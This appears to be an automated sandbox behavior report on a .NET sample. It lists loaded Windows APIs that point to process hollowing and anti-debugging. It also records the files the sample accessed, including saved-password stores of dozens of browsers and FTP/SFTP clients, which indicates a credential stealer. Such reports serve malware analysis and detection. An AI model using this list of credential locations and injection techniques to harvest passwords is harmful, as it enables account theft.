- DynamicLoader: ADVAPI32.dll/CryptGetProvParam
- DynamicLoader: ADVAPI32.dll/CryptGetUserKey
- DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
- DynamicLoader: MSCOREE.DLL/GetMetaDataInternalInterface
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface_RetAddr
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorwks.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorjit.dll/getJit
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetUserDefaultUILanguage
- DynamicLoader: KERNEL32.dll/SetErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
- DynamicLoader: mscoreei.dll/LoadLibraryShim
- DynamicLoader: culture.dll/ConvertLangIdToCultureName
- DynamicLoader: KERNEL32.dll/lstrlen
- DynamicLoader: KERNEL32.dll/lstrlenW
- DynamicLoader: MSCOREE.DLL/ND_RI4
- DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
- DynamicLoader: mscoreei.dll/ND_RI4
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GlobalMemoryStatusEx
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariable
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariableW
- DynamicLoader: KERNEL32.dll/SwitchToThread
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/EnumProcessModulesW
- DynamicLoader: psapi.dll/GetModuleInformation
- DynamicLoader: psapi.dll/GetModuleInformationW
- DynamicLoader: psapi.dll/GetModuleBaseName
- DynamicLoader: psapi.dll/GetModuleBaseNameW
- DynamicLoader: psapi.dll/GetModuleFileNameEx
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/DebugActiveProcess
- DynamicLoader: KERNEL32.dll/WaitForDebugEvent
- DynamicLoader: KERNEL32.dll/ContinueDebugEvent
- DynamicLoader: KERNEL32.dll/DeleteFileA
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: ADVAPI32.dll/SetKernelObjectSecurity
- DynamicLoader: ADVAPI32.dll/GetKernelObjectSecurity
- DynamicLoader: ntdll.dll/NtSetInformationProcess
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64GetThreadContext
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64SetThreadContext
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/TerminateProcess
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/CreateProcessW
- DynamicLoader: KERNEL32.dll/CreateProcessWW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: vaultcli.dll/VaultEnumerateItems
- DynamicLoader: vaultcli.dll/VaultEnumerateVaults
- DynamicLoader: vaultcli.dll/VaultFree
- DynamicLoader: vaultcli.dll/VaultGetItem
- DynamicLoader: vaultcli.dll/VaultOpenVault
- DynamicLoader: vaultcli.dll/VaultCloseVault
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: CRYPTSP.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
- DynamicLoader: CRYPTSP.dll/CryptDecrypt
- DynamicLoader: CRYPTSP.dll/CryptDestroyKey
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoInitializeSecurity
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: fntcache.dll/ServiceMain
- DynamicLoader: fntcache.dll/SvchostPushServiceGlobals
- DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
- DynamicLoader: RPCRT4.dll/UuidFromStringW
- DynamicLoader: radarrs.dll/WdiDiagnosticModuleMain
- DynamicLoader: radarrs.dll/WdiHandleInstance
- DynamicLoader: radarrs.dll/WdiGetDiagnosticModuleInterfaceVersion
- DynamicLoader: wkscli.dll/NetGetJoinInformation
- DynamicLoader: netutils.dll/NetApiBufferFree
- DynamicLoader: dfdts.dll/DfdGetDefaultPolicyAndSMARTW
- DynamicLoader: dfdts.dll/DfdGetDefaultPolicyAndSMARTA
- DynamicLoader: dfdts.dll/DfdGetDefaultPolicyAndSMART
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Possible date expiration check, exits too soon after checking local time
Severity: Medium
Confidence: Medium
- process: sc.exe, PID 3004
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:42:07 | 208 |
11 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\212121212112.exe.config
C:\Users\Seven01\AppData\Local\Temp\212121212112.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\212121212112.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\212121212112.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol36.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\212121212112.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\212121212112.resources\212121212112.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\212121212112.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\212121212112.resources\212121212112.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\212121212112.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\212121212112.resources\212121212112.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\212121212112.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\212121212112.resources\212121212112.resources.exe
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2276.24146906
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2276.24146906
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2276.24147093
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMustang Browser\Login Data
C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalOrbitum\Login Data
C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalIridium\Login Data
C:\Users\Seven01\AppData\LocalIridium\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Seven01\AppData\Roaming\Opera
C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
C:\Users\Seven01\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions
C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Seven01\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Seven01\AppData\Roaming\Cyberduck
